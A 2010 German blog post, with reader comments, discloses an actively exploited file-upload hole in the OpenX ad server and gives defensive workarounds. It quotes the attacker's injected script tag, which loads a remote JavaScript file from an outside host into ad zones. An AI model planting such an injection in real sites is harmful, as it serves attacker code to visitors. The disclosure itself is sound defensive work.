9. September 2010

Kritische Sicherheitslücke in OpenX 2.8.6 & Open Flash Chart 2

In OpenX 2.8.6 (und 2.8.5 und wahrscheinlich auch früheren Versionen) befindet sich eine Sicherheitslücke, über die ein Angreifer Zugriff auf den Server erlangen kann. Die Lücke wird bereits aktiv ausgenutzt (wie ich auf die harte Art erfahren musste). Es sieht so aus, als sei die Lücke im Kontext von OpenX derzeit nur Übeltätern bekannt, denn ich konnte nirgends sonst einen Hinweis darauf finden.

Betroffen ist folgende Datei:

/www/admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php

Diese Datei wird zusammen mit dem OpenX-Video-Plugin ausgeliefert. Es handelt sich dabei um eine Komponente von Open Flash Chart 2, die schon bekannt ist. Im Wesentlichen erlaubt es die Lücke, beliebigen Code auf den Server zu laden. Der Angreifer lädt so eine Backdoor in Form einer PHP-Datei auf den Server und hat dadurch die vollen Rechte des Webserver-Accounts und kann dadurch (unter anderem) die Kontrolle über die OpenX-Installation übernehmen.

In unserem Fall legte der Angreifer einen neuen OpenX-Admin namens „root“ an. Interessanterweise tauchte dieser Benutzer nirgends in den Accounts im OpenX-Backend auf. Er erschien aber im User Log, als er folgendes bösartige Script an eine unserer Werbezonen anhängte:

<script type="text/javascript" src="http://keyserveronline.com:8080/File.js"></script>

Überraschenderweise ist diese Lücke auch in der aktuellen Version von Open Flash Chart noch enthalten. Sie ist eigentlich nicht sonderlich schwer zu beheben, aber die Mühe scheint sich noch niemand gemacht zu haben. Ich auch nicht, da ich diese Komponente derzeit nicht benötige. Ein einfacher Workaround ist, die Datei zu löschen. Die Kernfunktionalität von OpenX sollte dadurch nicht beeinträchtigt werden. Alternativ kann man auch den Zugang zu der Datei per htaccess auf vertrauenswürdige Benutzer beschränken.

Ich empfehle jedem Nutzer von OpenX, das sofort zu tun. Die Lücke wird wie gesagt bereits aktiv ausgenutzt!

11 Comments

  1. Herzlichen Dank für Deine Information. Finde es wirklich toll wie ausführlich Du das problem beschrieben hast und was extrem wichtig ist, wie man es lösen sollte. Nicht jeder versteht genau was so alles im PHP Code drinsteht (meinereiner). Danke

    Comment by RSM — 10. September 2010 @ 7:49

  2. […] im Vermittlungsfall eine Provision. Shopbetreiber die OpenX ist Einsatz haben sollten reagieren. Einzelne Berichte verweisen bereits auf das Problem, einen offiziellen Fix oder Patch scheint es aber noch nicht zu […]

    Pingback by Lücke gefährdet OpenX Ad-Server « Ecommerce Fachwissen — 13. September 2010 @ 15:36

  3. […] with Florian I have recently investigated a security issue in OpenX where attackers could drop a web shell onto […]

    Pingback by Old security issue in recent OpenX installations » Beitrag » Rene Schmidt Freelancer — 13. September 2010 @ 16:13

  4. Thanks for letting people know about the potential vulnerability, which we have already resolved. We encourage everyone running the downloadable version of OpenX to upgrade to the latest version. For more info, please visit http://blog.openx.org/09/security-update/

    Comment by MichaelTodd — 15. September 2010 @ 7:22

  5. Ich hab bei mir dieselbe Datei noch an einer anderen Stelle gefunden:
    www/admin/plugins/apStatsGraphsUI/lib/ofc_upload_image.php
    Kann das jemand bestätigen, daß die da auch gelöscht werden soll/kann?

    Comment by Jens — 16. September 2010 @ 10:02

  6. Jens, das ist ein Plugin, das nicht zum Lieferumfang von OpenX gehört. Ich würde die Datei sicherheitshalber dort auch löschen.

    Wenn ich das richtig mitbekommen habe, gab es aber von dem Plugin-Anbieter kürzlich (noch bevor OpenX reagiert hat) ein Update. Kann gut sein, dass das Problem in der neuesten Version behoben ist.

    Comment by Flo — 16. September 2010 @ 11:02

  7. […] of the popular open source OpenX ad server allows attackers to remotely compromise a server. A few reports (German language link) even discuss successful attacks on OpenX servers in which the vulnerability […]

    Pingback by Year-old vulnerability endangers OpenX ad server — 16. September 2010 @ 12:49

  8. Danke Flo.

    Ich hab die Datei aus dem apStatsGraphsUI auch rausgeworfen, nachdem ein Vergleich mit Textpad exakt denselben Code geliefert hat wie beim VideoPlugin.

    In der Tat gibt es aber auch ein Update des apStatsGraphsUI Plugins, da fehlt die Datei schlichtweg drin.

    Comment by Jens — 17. September 2010 @ 12:40

  9. Danke für die Infos

    Comment by AdWords Agentur — 6. Oktober 2010 @ 19:47

  10. Ich hab die Datei aus dem apStatsGraphsUI auch rausgeworfen, nachdem ein Vergleich mit Textpad exakt denselben Code geliefert hat wie beim VideoPlugin

    Comment by Links of London — 8. Oktober 2010 @ 7:29

  11. Danke für die Infos. Ich hatte noch keine Probleme, aber Vorsorge ist immer besser!

    Comment by weber — 3. Januar 2011 @ 16:02

Die Kommentarfunktion ist zur Zeit leider deaktiviert.

Powered by WordPress

Abonnieren

blogoscoop